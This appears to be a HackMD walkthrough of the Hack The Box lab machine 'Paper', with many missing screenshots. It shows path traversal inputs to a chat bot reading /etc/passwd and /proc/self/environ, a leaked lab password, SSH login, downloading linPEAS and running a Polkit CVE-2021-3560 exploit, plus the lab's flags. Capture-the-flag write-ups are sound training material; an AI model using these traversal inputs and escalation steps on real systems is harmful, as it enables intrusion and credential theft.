Try   HackMD

[Hack The Box] HTB—Paper

1. Information gathering

Let's begin by scanning

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Useful informations on port 22, 80 and 443. The rest are filtered ports!

Let's check the hostname of the webserver through the response header

​​​​$curl -I http://10.10.11.143

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Let's map this hostname in /etc/hosts file and try to access the web server

​​​​#/etc/hosts
​​​​
​​​​
​​​​10.10.11.143   office.paper

2. Website exploitation

Let's open the website now

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Penetration Testing kit Add on provided more details on its Tech Stack and many more.

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Well, a new host!

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Let's add it too

​​​​#/etc/hosts
​​​​
​​​​
​​​​10.10.11.143   office.paper
​​​​10.10.11.143   chat.office.paper

Let's access it now

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Let's create an account and login

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

​​​​recyclops file ../../../../../etc/passwd

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

​​​​recyclops file ../../../../../proc/self/environ 

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

​​​​dwight/Queenofblad3s!23

Let's use this creds to have an ssh session on the system

​​​​ssh dwight@10.10.11.143

one, two, three catched the user flag

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

user flag:0edf5f0f21681b3ccefb4151bd9e1eb3

3. Privileges Escalation

Let's download and execute our favorite Linux priviliges escalation tool

​​​​wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64

Catched Polkit CVE

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

CVE-2021-3560 poc
https://github.com/Almorabea/Polkit-exploit

Download and run the exploit on the machine

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Got the root flag

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

root flag: f48bd0125f4411b932f0697bc8f4dff7

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →